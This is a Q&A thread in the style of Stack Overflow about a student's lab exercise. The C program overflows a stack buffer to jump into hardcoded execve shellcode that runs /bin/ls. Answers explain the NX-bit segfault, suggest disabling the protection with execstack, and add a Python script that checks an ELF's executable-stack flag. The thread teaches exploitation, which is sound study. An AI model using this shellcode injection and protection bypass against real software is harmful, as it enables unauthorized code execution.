
I'm trying to cause a buffer overflow in the following, very simple, program:

#include <stdio.h>
#include <stdint.h>

void badf(int n, char c, char* buffer)
{
    char mycode[] = {
        0xeb, 0x0f, 0xb8, 0x0b,
        0x00, 0x00, 0x00, 0x8b,
        0x1c, 0x24, 0x8d, 0x0c,
        0x24, 0x31, 0xd2, 0xcd,
        0x80, 0xe8, 0xec, 0xff,
        0xff, 0xff, 0x2f, 0x62,
        0x69, 0x6e, 0x2f, 0x6c,
        0x73, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00,
        0x00
    }; // 37 bytes

    // The writes below are deliberately out of bounds of the 37-byte array:
    // they are the overflow under test and land on badf's saved registers.

    // Overwrite Base Pointer
    //mycode[37] = 0x29;
    //mycode[38] = 0xf4;
    //mycode[39] = 0xff;
    //mycode[40] = 0xbf;

    // Overwrite Instruction Pointer
    // Using debugger, found mycode[] to be loaded in: 0xbffff42d
    mycode[41] = 0x2d;
    mycode[42] = 0xf4;
    mycode[43] = 0xff;
    mycode[44] = 0xbf;
}

void f(int n, char c)
{
    char buffer[37];
    badf(n, c, buffer);
}

void test()
{
    printf("test");
}

int main()
{
    f(37, 0x00);
    return 0;
}

(I've successfully managed to execute test() from the buffer overflow before.) Now I'm trying to execute mycode[] by overwriting the instruction pointer with the start of mycode on the stack.

This only half works: the program jumps to the right address, where I can see the correct machine code in the debugger, but then crashes with a segmentation fault instead of executing the following instructions (see screenshot).

[screenshot: debugger view at the point of the crash]

I'm trying to figure out why it crashes before executing the contents of the "injected" code. I'm relatively new to this sort of stuff; I understand a segmentation fault means I'm attempting to access memory the OS doesn't want me to?

(PS: 32bit Linux machine, compiling with -fno-stack-protector so I can play with this stuff)

(If any more info is needed I will gladly update the post)

  • Did you solve your problem? I have the same issue. (Commented Mar 14, 2017 at 16:35)

2 Answers


If it's Linux, you can probably make it work by downloading and installing execstack, and following the instructions here. The segmentation fault is probably a result of your ELF binaries setting the NX bit by default, which execstack selectively undoes. If this doesn't work, you might trigger additional protections, which you may or may not be able to disable.


7 Comments

I tried compiling with: "gcc -z execstack -fno-stack-protector -g -static -o bof bof.c" which should do the same no?
@Juicy: this wouldn't work on my distro. Execstack needed to be separately downloaded and installed, and you use it as execstack -s <binary name>. You occasionally see the syntax you write suggested, but it doesn't work for me.
It's in the repositories though (for my distro); so simply doing sudo apt-get install execstack should take care of install and configuration.
Thank you! Gave that a try but it's still giving me the seg fault. I believe, as I told dan3, that I've actually done what my lecturer wanted, it's not working on my Debian but hopefully will work on our Uni's Ubuntus.
Well the code that shows up in the debugger at that address is exactly the machine code I tried to inject (system call to execv), so it seems like the right code at the right address

This sort of exciting trick doesn't work nowadays anymore, sadly. Blame the virus people.

Data segments are marked with the NX (no execute) bit -- which is what triggers the segfault. CPU sees PC in a no-execute region.

Why don't you try overwriting the code of a "real" function pointer (take the address of an existing function) and see what happens (this will possibly fail because self-modifying code is also frowned upon by the compiler / linker / OS, also due to above-mentioned virus people)

2 Comments

Ok, thank you. This is actually for an exercise for school, but I'm doing it at home. Do you think I can conclude that I've successfully injected the code and redirected the instruction pointer, but that my modern Debian distro is preventing this from happening?
You can only conclude that you've successfully injected some machine code into a variable, then failed to execute it. Perhaps it would have worked were it not for the NX protections, perhaps not. Update: see suggestion in edited answer
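Both answers come down to one loader property: whether the binary's PT_GNU_STACK program header carries the PF_X flag. `gcc -z execstack` and `execstack -s` both set that flag, and the kernel consults it when mapping the stack; without it the stack is mapped NX and a jump into a stack buffer faults exactly as the question describes. The script below is an added example written for this thread (it is not code from the question or either answer): it parses the ELF program-header table and reports the PT_GNU_STACK flags, which is the check to run before concluding that `-z execstack` took effect. The images produced by `build_sample_elf` are constructed headers-only byte strings for the demonstration, not real binaries; on a real file run `python check_stack.py ./bof`, and compare with `readelf -lW ./bof | grep GNU_STACK`, which shows the same flags as RW or RWE.

```python
"""Report whether an ELF file requests an executable stack (PT_GNU_STACK).

Added example for this thread; constructed here, not taken from the question
or either answer. `gcc -z execstack` and `execstack -s` both set PF_X on the
PT_GNU_STACK program header, and the loader consults that bit when it maps
the stack; a stack without PF_X is mapped NX.
"""
import struct
import sys

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def gnu_stack_flags(data):
    """Return p_flags of the PT_GNU_STACK header, or None if the file has none.

    Handles ELF32/ELF64 and both byte orders by reading e_phoff, e_phentsize
    and e_phnum at their fixed offsets in the ELF header.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    endian = "<" if ei_data == 1 else ">"
    if ei_class == 1:  # ELF32: e_phoff @0x1c, e_phentsize/e_phnum @0x2a
        (e_phoff,) = struct.unpack_from(endian + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x2A)
        fmt, flags_idx = endian + "IIIIIIII", 6   # p_flags is the 7th field
    elif ei_class == 2:  # ELF64: e_phoff @0x20, e_phentsize/e_phnum @0x36
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x36)
        fmt, flags_idx = endian + "IIQQQQQQ", 1   # p_flags is the 2nd field
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    for i in range(e_phnum):
        fields = struct.unpack_from(fmt, data, e_phoff + i * e_phentsize)
        if fields[0] == PT_GNU_STACK:
            return fields[flags_idx]
    return None


def stack_is_executable(data):
    """True if PF_X is set on PT_GNU_STACK, False if clear, None if the header
    is absent (then the toolchain/kernel default applies; check it separately)."""
    flags = gnu_stack_flags(data)
    return None if flags is None else bool(flags & PF_X)


def describe(data):
    """One-line verdict in readelf's R/W/E notation."""
    flags = gnu_stack_flags(data)
    if flags is None:
        return "no PT_GNU_STACK header: loader default applies"
    perms = "".join(ch if flags & bit else "-"
                    for ch, bit in (("R", PF_R), ("W", PF_W), ("E", PF_X)))
    verdict = "EXECUTABLE" if flags & PF_X else "non-executable (NX)"
    return "PT_GNU_STACK %s: stack is %s" % (perms, verdict)


def build_sample_elf(stack_flags, include_gnu_stack=True, elf64=False):
    """Constructed headers-only ELF image for the demo (not a runnable binary)."""
    def phdr(p_type, flags):
        if elf64:  # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
            return struct.pack("<IIQQQQQQ", p_type, flags, 0, 0, 0, 0, 0, 0x10)
        # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        return struct.pack("<IIIIIIII", p_type, 0, 0, 0, 0, 0, flags, 0x10)
    phdrs = [phdr(PT_LOAD, PF_R | PF_X)]
    if include_gnu_stack:
        phdrs.append(phdr(PT_GNU_STACK, stack_flags))
    if elf64:  # e_type=ET_EXEC, e_machine=x86-64, phoff=64, ehsize=64, phentsize=56
        e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
        ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 64, 0, 0,
                                     64, 56, len(phdrs), 0, 0, 0)
    else:      # e_type=ET_EXEC, e_machine=i386, phoff=52, ehsize=52, phentsize=32
        e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)
        ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0,
                                     52, 32, len(phdrs), 0, 0, 0)
    return ehdr + b"".join(phdrs)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python check_stack.py ./bof
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], "->", describe(fh.read()))
    else:                  # demo on constructed images
        print("default link ->", describe(build_sample_elf(PF_R | PF_W)))
        print("-z execstack ->", describe(build_sample_elf(PF_R | PF_W | PF_X, elf64=True)))
        print("no header    ->", describe(build_sample_elf(0, include_gnu_stack=False)))
```

A result of "RW-" means the linker left the stack non-executable, so the jump into mycode[] will fault regardless of how accurate the overwritten return address is; "RWE" means the binary asks for an executable stack, and a fault that persists then points at a protection outside the binary itself, which is the situation the second answer's closing comment leaves open.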
